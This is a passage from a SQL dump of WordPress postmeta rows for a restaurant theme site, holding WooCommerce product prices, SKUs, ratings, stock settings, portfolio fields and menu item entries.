<notifiche@ristorantesolymar.it>\r\n'),(26408,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26409,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26410,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26411,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26412,2941,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26413,2941,'mkdf_page_content_behind_header_meta','no'),(26414,2941,'mkdf_page_content_padding','115px 0 100px 0'),(26415,2941,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(26416,2941,'portfolio_single_back_to_link','610'),(26417,2941,'mkdf_disable_vertical_header_background_image_meta','no'),(26418,2941,'mkdf_disable_header_widget_areas_meta','no'),(26419,2941,'slide_template','default'),(26420,2941,'_wpb_vc_js_status','true'),(26421,2941,'mkdf-portfolio-image-gallery','567,566,565'),(26422,2941,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(26423,2941,'mkdf_portfolio_single_template_meta','gallery'),(26424,2941,'_thumbnail_id','1099'),(26425,2941,'_wp_old_slug','h6-5'),(26426,2941,'_dp_original','645'),(26431,2942,'mkdf_page_content_behind_header_meta','no'),(26432,2942,'mkdf_page_content_padding','115px 0 100px 0'),(26433,2942,'mkdf_page_content_padding_mobile','100px 0 100px 0'),(26434,2942,'portfolio_single_back_to_link','36'),(26435,2942,'mkdf_disable_vertical_header_background_image_meta','no'),(26436,2942,'mkdf_disable_header_widget_areas_meta','no'),(26437,2942,'slide_template',''),(26438,2942,'_wpb_vc_js_status','true'),(26439,2942,'mkdf-portfolio-image-gallery','565,566,567'),(26440,2942,'mkdf_portfolio_single_template_meta','small-slider'),(26441,2942,'mkdf_portfolio_properties','a:1:{i:0;a:3:{s:10:\"item_title\";s:7:\"Author:\";s:9:\"item_text\";s:11:\" John Prine\";s:8:\"item_url\";s:1:\"#\";}}'),(26443,2942,'_wp_old_slug','h6-4'),(26444,2942,'_wp_old_slug','cream-soup'),(26445,2942,'_dp_original','644'),(38437,3754,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38438,3754,'_menu_item_xfn',''),(38436,3754,'_menu_item_target',''),(38435,3754,'_menu_item_object','custom'),(38434,3754,'_menu_item_object_id','3754'),(38433,3754,'_menu_item_menu_item_parent','3727'),(38432,3754,'_menu_item_type','custom'),(38431,3753,'_menu_item_icon','null'),(38430,3753,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38429,3753,'_menu_item_url','#'),(38428,3753,'_menu_item_xfn',''),(38427,3753,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38426,3753,'_menu_item_target',''),(38425,3753,'_menu_item_object','custom'),(38424,3753,'_menu_item_object_id','3753'),(26464,3106,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26465,3106,'_wc_review_count','0'),(26466,3106,'_wc_rating_count','a:1:{i:4;i:1;}'),(26467,3106,'_wc_average_rating','4.00'),(26468,3106,'_thumbnail_id','38'),(26469,3106,'mkdf_show_new_sign_woo_meta','no'),(26470,3106,'_sku','PR0014'),(26471,3106,'_regular_price','48'),(26472,3106,'_sale_price',''),(26473,3106,'_sale_price_dates_from',''),(26474,3106,'_sale_price_dates_to',''),(26475,3106,'total_sales','0'),(26476,3106,'_tax_status','taxable'),(26477,3106,'_tax_class',''),(26478,3106,'_manage_stock','no'),(26479,3106,'_backorders','no'),(26480,3106,'_sold_individually','no'),(26481,3106,'_weight','310'),(26482,3106,'_length',''),(26483,3106,'_width',''),(26484,3106,'_height',''),(26485,3106,'_upsell_ids','a:0:{}'),(26486,3106,'_crosssell_ids','a:0:{}'),(26487,3106,'_purchase_note',''),(26488,3106,'_default_attributes','a:0:{}'),(26489,3106,'_virtual','no'),(26490,3106,'_downloadable','no'),(26491,3106,'_product_image_gallery',''),(26492,3106,'_download_limit','-1'),(26493,3106,'_download_expiry','-1'),(26494,3106,'_stock',''),(26495,3106,'_stock_status','instock'),(26496,3106,'_product_version','4.7.1'),(26497,3106,'_price','48'),(26498,3106,'slide_template','default'),(26499,3106,'_wpb_vc_js_status','false'),(26500,3106,'_wp_old_slug','crispy-sesame-cake'),(26501,3106,'_wp_old_slug','charleston-shrimp-grits'),(26502,3106,'_wp_old_slug','garnished-charleston-shrimp'),(26503,3106,'_wp_old_slug','garnished-magnolias-shrimp'),(26504,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26505,98,'_sku','PR0015'),(26506,98,'_regular_price','67'),(26507,98,'_sale_price',''),(26508,98,'_sale_price_dates_from',''),(26509,98,'_sale_price_dates_to',''),(26510,98,'total_sales','0'),(26511,98,'_tax_status','taxable'),(26512,98,'_tax_class',''),(26513,98,'_manage_stock','no'),(26514,98,'_backorders','no'),(26515,98,'_sold_individually','no'),(26516,98,'_weight','400'),(26517,98,'_length',''),(26518,98,'_width',''),(26519,98,'_height',''),(26520,98,'_upsell_ids','a:0:{}'),(26521,98,'_crosssell_ids','a:0:{}'),(26522,98,'_purchase_note',''),(26523,98,'_default_attributes','a:0:{}'),(26524,98,'_virtual','no'),(26525,98,'_downloadable','no'),(26526,98,'_product_image_gallery',''),(26527,98,'_download_limit','-1'),(26528,98,'_download_expiry','-1'),(26530,98,'_stock',''),(26531,98,'_stock_status','instock'),(26532,98,'_wc_average_rating','3.50'),(26533,98,'_wc_rating_count','a:2:{i:3;i:1;i:4;i:1;}'),(26534,98,'_wc_review_count','0'),(26535,98,'_downloadable_files','a:0:{}'),(26536,98,'_product_attributes','a:0:{}'),(26537,98,'_product_version','4.7.1'),(26538,98,'_price','67'),(26539,98,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26540,98,'mkdf_show_new_sign_woo_meta','no'),(26541,98,'slide_template','default'),(26542,98,'_wpb_vc_js_status','false'),(26543,98,'_wp_old_slug','tuna-with-crispy-artichoke'),(26544,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26545,3107,'_sku','PR0016'),(26546,3107,'_regular_price','73'),(26547,3107,'_sale_price',''),(26548,3107,'_sale_price_dates_from',''),(26549,3107,'_sale_price_dates_to',''),(26550,3107,'total_sales','0'),(26551,3107,'_tax_status','taxable'),(26552,3107,'_tax_class',''),(26553,3107,'_manage_stock','no'),(26554,3107,'_backorders','no'),(26555,3107,'_sold_individually','no'),(26556,3107,'_weight','250'),(26557,3107,'_length',''),(26558,3107,'_width',''),(26559,3107,'_height',''),(26560,3107,'_upsell_ids','a:0:{}'),(26561,3107,'_crosssell_ids','a:0:{}'),(26562,3107,'_purchase_note',''),(26563,3107,'_default_attributes','a:0:{}'),(26564,3107,'_virtual','no'),(26565,3107,'_downloadable','no'),(26566,3107,'_product_image_gallery',''),(26567,3107,'_download_limit','-1'),(26568,3107,'_download_expiry','-1'),(26569,3107,'_thumbnail_id','40'),(26570,3107,'_stock',''),(26571,3107,'_stock_status','instock'),(26572,3107,'_wc_average_rating','5.00'),(26573,3107,'_wc_rating_count','a:1:{i:5;i:1;}'),(26574,3107,'_wc_review_count','0'),(26575,3107,'_downloadable_files','a:0:{}'),(26576,3107,'_product_attributes','a:0:{}'),(26577,3107,'_product_version','4.7.1'),(26578,3107,'_price','73'),(26579,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26580,3107,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26581,3107,'mkdf_show_new_sign_woo_meta','no'),(26582,3107,'slide_template','default'),(26583,3107,'_wpb_vc_js_status','false'),(26584,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26585,3108,'_sku','PR0017'),(26586,3108,'_regular_price','58'),(26587,3108,'_sale_price',''),(26588,3108,'_sale_price_dates_from',''),(26589,3108,'_sale_price_dates_to',''),(26590,3108,'total_sales','0'),(26591,3108,'_tax_status','taxable'),(26592,3108,'_tax_class',''),(26593,3108,'_manage_stock','no'),(26594,3108,'_backorders','no'),(26595,3108,'_sold_individually','no'),(26596,3108,'_weight','315'),(26597,3108,'_length',''),(26598,3108,'_width',''),(26599,3108,'_height',''),(26600,3108,'_upsell_ids','a:0:{}'),(26601,3108,'_crosssell_ids','a:0:{}'),(26602,3108,'_purchase_note',''),(26603,3108,'_default_attributes','a:0:{}'),(26604,3108,'_virtual','no'),(26605,3108,'_downloadable','no'),(26606,3108,'_product_image_gallery',''),(26607,3108,'_download_limit','-1'),(26608,3108,'_download_expiry','-1'),(26609,3108,'_thumbnail_id','41'),(26610,3108,'_stock',''),(26611,3108,'_stock_status','outofstock'),(26612,3108,'_wc_average_rating','3.00'),(26613,3108,'_wc_rating_count','a:1:{i:3;i:1;}'),(26614,3108,'_wc_review_count','0'),(26615,3108,'_downloadable_files','a:0:{}'),(26616,3108,'_product_attributes','a:0:{}'),(26617,3108,'_product_version','4.7.1'),(26618,3108,'_price','58'),(26619,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26620,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26621,3108,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26622,3108,'mkdf_show_new_sign_woo_meta','no'),(26623,3108,'slide_template','default'),(26624,3108,'_wpb_vc_js_status','false'),(26625,3108,'_wp_old_slug','gadabout-with-salad'),(26626,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26627,3109,'_sku','PR0018'),(26628,3109,'_regular_price','80'),(26629,3109,'_sale_price','72'),(26630,3109,'_sale_price_dates_from',''),(26631,3109,'_sale_price_dates_to',''),(26632,3109,'total_sales','0'),(26633,3109,'_tax_status','taxable'),(26634,3109,'_tax_class',''),(26635,3109,'_manage_stock','no'),(26636,3109,'_backorders','no'),(26637,3109,'_sold_individually','no'),(26638,3109,'_weight','215'),(26639,3109,'_length',''),(26640,3109,'_width',''),(26641,3109,'_height',''),(26642,3109,'_upsell_ids','a:0:{}'),(26643,3109,'_crosssell_ids','a:0:{}'),(26644,3109,'_purchase_note',''),(26645,3109,'_default_attributes','a:0:{}'),(26646,3109,'_virtual','no'),(26647,3109,'_downloadable','no'),(26648,3109,'_product_image_gallery',''),(26649,3109,'_download_limit','-1'),(26650,3109,'_download_expiry','-1'),(26652,3109,'_stock',''),(26653,3109,'_stock_status','instock'),(26654,3109,'_wc_average_rating','5.00'),(26655,3109,'_wc_rating_count','a:1:{i:5;i:1;}'),(26656,3109,'_wc_review_count','0'),(26657,3109,'_downloadable_files','a:0:{}'),(26658,3109,'_product_attributes','a:0:{}'),(26659,3109,'_product_version','4.7.1'),(26660,3109,'_price','72'),(26661,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26662,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26663,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26664,3109,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26665,3109,'mkdf_show_new_sign_woo_meta','no'),(26666,3109,'slide_template','default'),(26667,3109,'_wpb_vc_js_status','false'),(26668,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26669,3110,'_sku','PR0019'),(26670,3110,'_regular_price','67'),(26671,3110,'_sale_price',''),(26672,3110,'_sale_price_dates_from',''),(26673,3110,'_sale_price_dates_to',''),(26674,3110,'total_sales','0'),(26675,3110,'_tax_status','taxable'),(26676,3110,'_tax_class',''),(26677,3110,'_manage_stock','no'),(26678,3110,'_backorders','no'),(26679,3110,'_sold_individually','no'),(26680,3110,'_weight','150'),(26681,3110,'_length',''),(26682,3110,'_width',''),(26683,3110,'_height',''),(26684,3110,'_upsell_ids','a:0:{}'),(26685,3110,'_crosssell_ids','a:0:{}'),(26686,3110,'_purchase_note',''),(26687,3110,'_default_attributes','a:0:{}'),(26688,3110,'_virtual','no'),(26689,3110,'_downloadable','no'),(26690,3110,'_product_image_gallery',''),(26691,3110,'_download_limit','-1'),(26692,3110,'_download_expiry','-1'),(26693,3110,'_thumbnail_id','43'),(26694,3110,'_stock',''),(26695,3110,'_stock_status','instock'),(26696,3110,'_wc_average_rating','4.00'),(26697,3110,'_wc_rating_count','a:1:{i:4;i:1;}'),(26698,3110,'_wc_review_count','0'),(26699,3110,'_downloadable_files','a:0:{}'),(26700,3110,'_product_attributes','a:0:{}'),(26701,3110,'_product_version','4.7.1'),(26702,3110,'_price','67'),(26703,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26704,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26705,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26706,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26707,3110,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26708,3110,'mkdf_show_new_sign_woo_meta','no'),(26709,3110,'slide_template','default'),(26710,3110,'_wpb_vc_js_status','false'),(26711,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26712,3111,'_sku','PR0020'),(26713,3111,'_regular_price','67'),(26714,3111,'_sale_price',''),(26715,3111,'_sale_price_dates_from',''),(26716,3111,'_sale_price_dates_to',''),(26717,3111,'total_sales','0'),(26718,3111,'_tax_status','taxable'),(26719,3111,'_tax_class',''),(26720,3111,'_manage_stock','no'),(26721,3111,'_backorders','no'),(26722,3111,'_sold_individually','no'),(26723,3111,'_weight','150'),(26724,3111,'_length',''),(26725,3111,'_width',''),(26726,3111,'_height',''),(26727,3111,'_upsell_ids','a:0:{}'),(26728,3111,'_crosssell_ids','a:0:{}'),(26729,3111,'_purchase_note',''),(26730,3111,'_default_attributes','a:0:{}'),(26731,3111,'_virtual','no'),(26732,3111,'_downloadable','no'),(26733,3111,'_product_image_gallery',''),(26734,3111,'_download_limit','-1'),(26735,3111,'_download_expiry','-1'),(26737,3111,'_stock',''),(26738,3111,'_stock_status','instock'),(26739,3111,'_wc_average_rating','4.00'),(26740,3111,'_wc_rating_count','a:1:{i:4;i:1;}'),(26741,3111,'_wc_review_count','0'),(26742,3111,'_downloadable_files','a:0:{}'),(26743,3111,'_product_attributes','a:0:{}'),(26744,3111,'_product_version','4.7.1'),(26745,3111,'_price','67'),(26746,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26747,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26748,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26749,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26750,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26751,3111,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26752,3111,'mkdf_show_new_sign_woo_meta','no'),(26753,3111,'slide_template',''),(26754,3111,'_wpb_vc_js_status','false'),(26755,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26756,177,'_sku','PR0021'),(26757,177,'_regular_price','86'),(26758,177,'_sale_price',''),(26759,177,'_sale_price_dates_from',''),(26760,177,'_sale_price_dates_to',''),(26761,177,'total_sales','0'),(26762,177,'_tax_status','taxable'),(26763,177,'_tax_class',''),(26764,177,'_manage_stock','no'),(26765,177,'_backorders','no'),(26766,177,'_sold_individually','no'),(26767,177,'_weight','180'),(26768,177,'_length',''),(26769,177,'_width',''),(26770,177,'_height',''),(26771,177,'_upsell_ids','a:0:{}'),(26772,177,'_crosssell_ids','a:0:{}'),(26773,177,'_purchase_note',''),(26774,177,'_default_attributes','a:0:{}'),(26775,177,'_virtual','no'),(26776,177,'_downloadable','no'),(26777,177,'_product_image_gallery',''),(26778,177,'_download_limit','-1'),(26779,177,'_download_expiry','-1'),(26780,177,'_thumbnail_id','45'),(26781,177,'_stock',''),(26782,177,'_stock_status','instock'),(26783,177,'_wc_average_rating','5.00'),(26784,177,'_wc_rating_count','a:1:{i:5;i:1;}'),(26785,177,'_wc_review_count','0'),(26786,177,'_downloadable_files','a:0:{}'),(26787,177,'_product_attributes','a:0:{}'),(26788,177,'_product_version','4.7.1'),(26789,177,'_price','86'),(26790,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26791,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26792,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26793,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26794,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26795,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26796,177,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26797,177,'mkdf_show_new_sign_woo_meta','yes'),(26798,177,'slide_template','default'),(26799,177,'_wpb_vc_js_status','false'),(26800,177,'_wp_old_slug','pancakes-with-caviar'),(26801,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26802,180,'_sku','PR0022'),(26803,180,'_regular_price','86'),(26804,180,'_sale_price',''),(26805,180,'_sale_price_dates_from',''),(26806,180,'_sale_price_dates_to',''),(26807,180,'total_sales','0'),(26808,180,'_tax_status','taxable'),(26809,180,'_tax_class',''),(26810,180,'_manage_stock','no'),(26811,180,'_backorders','no'),(26812,180,'_sold_individually','no'),(26813,180,'_weight','230'),(26814,180,'_length',''),(26815,180,'_width',''),(26816,180,'_height',''),(26817,180,'_upsell_ids','a:0:{}'),(26818,180,'_crosssell_ids','a:0:{}'),(26819,180,'_purchase_note',''),(26820,180,'_default_attributes','a:0:{}'),(26821,180,'_virtual','no'),(26822,180,'_downloadable','no'),(26823,180,'_product_image_gallery',''),(26824,180,'_download_limit','-1'),(26825,180,'_download_expiry','-1'),(26827,180,'_stock',''),(26828,180,'_stock_status','instock'),(26829,180,'_wc_average_rating','4.50'),(26830,180,'_wc_rating_count','a:2:{i:4;i:1;i:5;i:1;}'),(26831,180,'_wc_review_count','0'),(26832,180,'_downloadable_files','a:0:{}'),(26833,180,'_product_attributes','a:0:{}'),(26834,180,'_product_version','4.7.1'),(26835,180,'_price','86'),(26836,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26837,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26838,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26839,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26840,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26841,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26842,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26843,180,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26844,180,'mkdf_show_new_sign_woo_meta','no'),(26845,180,'slide_template','default'),(26846,180,'_wpb_vc_js_status','false'),(26847,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26848,3112,'_sku','PR0023'),(26849,3112,'_regular_price','86'),(26850,3112,'_sale_price',''),(26851,3112,'_sale_price_dates_from',''),(26852,3112,'_sale_price_dates_to',''),(26853,3112,'total_sales','0'),(26854,3112,'_tax_status','taxable'),(26855,3112,'_tax_class',''),(26856,3112,'_manage_stock','no'),(26857,3112,'_backorders','no'),(26858,3112,'_sold_individually','no'),(26859,3112,'_weight','280'),(26860,3112,'_length',''),(26861,3112,'_width',''),(26862,3112,'_height',''),(26863,3112,'_upsell_ids','a:0:{}'),(26864,3112,'_crosssell_ids','a:0:{}'),(26865,3112,'_purchase_note',''),(26866,3112,'_default_attributes','a:0:{}'),(26867,3112,'_virtual','no'),(26868,3112,'_downloadable','no'),(26869,3112,'_product_image_gallery',''),(26870,3112,'_download_limit','-1'),(26871,3112,'_download_expiry','-1'),(26872,3112,'_thumbnail_id','47'),(26873,3112,'_stock',''),(26874,3112,'_stock_status','instock'),(26875,3112,'_wc_average_rating','3.00'),(26876,3112,'_wc_rating_count','a:2:{i:2;i:1;i:4;i:1;}'),(26877,3112,'_wc_review_count','0'),(26878,3112,'_downloadable_files','a:0:{}'),(26879,3112,'_product_attributes','a:0:{}'),(26880,3112,'_product_version','4.7.1'),(26881,3112,'_price','86'),(26882,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26883,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26884,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26885,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26886,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26887,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26888,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26889,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26890,3112,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26891,3112,'mkdf_show_new_sign_woo_meta','no'),(26892,3112,'slide_template','default'),(26893,3112,'_wpb_vc_js_status','false'),(26894,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26895,3113,'_sku','PR0024'),(26896,3113,'_regular_price','86'),(26897,3113,'_sale_price',''),(26898,3113,'_sale_price_dates_from',''),(26899,3113,'_sale_price_dates_to',''),(26900,3113,'total_sales','0'),(26901,3113,'_tax_status','taxable'),(26902,3113,'_tax_class',''),(26903,3113,'_manage_stock','no'),(26904,3113,'_backorders','no'),(26905,3113,'_sold_individually','no'),(26906,3113,'_weight','230'),(26907,3113,'_length',''),(26908,3113,'_width',''),(26909,3113,'_height',''),(26910,3113,'_upsell_ids','a:0:{}'),(26911,3113,'_crosssell_ids','a:0:{}'),(26912,3113,'_purchase_note',''),(26913,3113,'_default_attributes','a:0:{}'),(26914,3113,'_virtual','no'),(26915,3113,'_downloadable','no'),(26916,3113,'_product_image_gallery',''),(26917,3113,'_download_limit','-1'),(26918,3113,'_download_expiry','-1'),(26919,3113,'_thumbnail_id','48'),(26920,3113,'_stock',''),(26921,3113,'_stock_status','instock'),(26922,3113,'_wc_average_rating','5.00'),(26923,3113,'_wc_rating_count','a:1:{i:5;i:1;}'),(26924,3113,'_wc_review_count','0'),(26925,3113,'_downloadable_files','a:0:{}'),(26926,3113,'_product_attributes','a:0:{}'),(26927,3113,'_product_version','4.7.1'),(26928,3113,'_price','86'),(26929,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26930,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26931,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26932,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26933,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26934,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26935,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26936,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26937,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26938,3113,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26939,3113,'mkdf_show_new_sign_woo_meta','no'),(26940,3113,'slide_template','default'),(26941,3113,'_wpb_vc_js_status','false'),(26942,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26943,3114,'_sku','PR0025'),(26944,3114,'_regular_price','86'),(26945,3114,'_sale_price',''),(26946,3114,'_sale_price_dates_from',''),(26947,3114,'_sale_price_dates_to',''),(26948,3114,'total_sales','0'),(26949,3114,'_tax_status','taxable'),(26950,3114,'_tax_class',''),(26951,3114,'_manage_stock','no'),(26952,3114,'_backorders','no'),(26953,3114,'_sold_individually','no'),(26954,3114,'_weight','310'),(26955,3114,'_length',''),(26956,3114,'_width',''),(26957,3114,'_height',''),(26958,3114,'_upsell_ids','a:0:{}'),(26959,3114,'_crosssell_ids','a:0:{}'),(26960,3114,'_purchase_note',''),(26961,3114,'_default_attributes','a:0:{}'),(26962,3114,'_virtual','no'),(26963,3114,'_downloadable','no'),(26964,3114,'_product_image_gallery',''),(26965,3114,'_download_limit','-1'),(26966,3114,'_download_expiry','-1'),(26967,3114,'_thumbnail_id','49'),(26968,3114,'_stock',''),(26969,3114,'_stock_status','instock'),(26970,3114,'_wc_average_rating','1.00'),(26971,3114,'_wc_rating_count','a:1:{i:1;i:1;}'),(26972,3114,'_wc_review_count','0'),(26973,3114,'_downloadable_files','a:0:{}'),(26974,3114,'_product_attributes','a:0:{}'),(26975,3114,'_product_version','4.7.1'),(26976,3114,'_price','86'),(26977,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26978,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26979,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26980,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26981,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26982,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26983,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26984,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26985,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26986,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26987,3114,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(26988,3114,'mkdf_show_new_sign_woo_meta','no'),(26989,3114,'slide_template','default'),(26990,3114,'_wpb_vc_js_status','false'),(38336,3744,'_menu_item_object_id','3744'),(38337,3744,'_menu_item_object','custom'),(38335,3744,'_menu_item_menu_item_parent','3725'),(38333,3743,'_menu_item_icon','null'),(38334,3744,'_menu_item_type','custom'),(38332,3743,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38331,3743,'_menu_item_url','http://attika.mikado-themes.com/product/crispy-sesame-cake/'),(38330,3743,'_menu_item_xfn',''),(38329,3743,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38328,3743,'_menu_item_target',''),(38327,3743,'_menu_item_object','custom'),(38326,3743,'_menu_item_object_id','3743'),(38325,3743,'_menu_item_menu_item_parent','3725'),(38324,3743,'_menu_item_type','custom'),(38322,3742,'_menu_item_url','#'),(38323,3742,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38321,3742,'_menu_item_xfn',''),(38320,3742,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38319,3742,'_menu_item_target',''),(38292,3739,'_menu_item_target',''),(38293,3739,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38294,3739,'_menu_item_xfn',''),(38295,3739,'_menu_item_url','#'),(38296,3739,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38297,3740,'_menu_item_type','custom'),(38298,3740,'_menu_item_menu_item_parent','0'),(38299,3740,'_menu_item_object_id','3740'),(38300,3740,'_menu_item_object','custom'),(38301,3740,'_menu_item_target',''),(38302,3740,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38303,3740,'_menu_item_xfn',''),(38304,3740,'_menu_item_url','#'),(38305,3740,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38306,3741,'_menu_item_type','custom'),(38307,3741,'_menu_item_menu_item_parent','0'),(38308,3741,'_menu_item_object_id','3741'),(38309,3741,'_menu_item_object','custom'),(38310,3741,'_menu_item_target',''),(38311,3741,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38312,3741,'_menu_item_xfn',''),(38313,3741,'_menu_item_url','#'),(38314,3741,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38315,3742,'_menu_item_type','custom'),(38316,3742,'_menu_item_menu_item_parent','0'),(38317,3742,'_menu_item_object_id','3742'),(38318,3742,'_menu_item_object','custom'),(38215,3731,'_menu_item_object','custom'),(38214,3731,'_menu_item_object_id','3731'),(38212,3731,'_menu_item_type','custom'),(38213,3731,'_menu_item_menu_item_parent','0'),(38211,3730,'_menu_item_icon','null'),(38210,3730,'_vc_post_settings','a:1:{s:10:\"vc_grid_id\";a:0:{}}'),(38209,3730,'_menu_item_url','#'),(38207,3730,'_menu_item_classes','a:1:{i:0;s:0:\"\";}'),(38208,3730,'_menu_item_xfn',''),(38206,3730,'_menu_item_target',''),(38205,3730,'_menu_item_object','custom'),(38204,3730,'_menu_item_object_id','3730'),(38203,3730,'_menu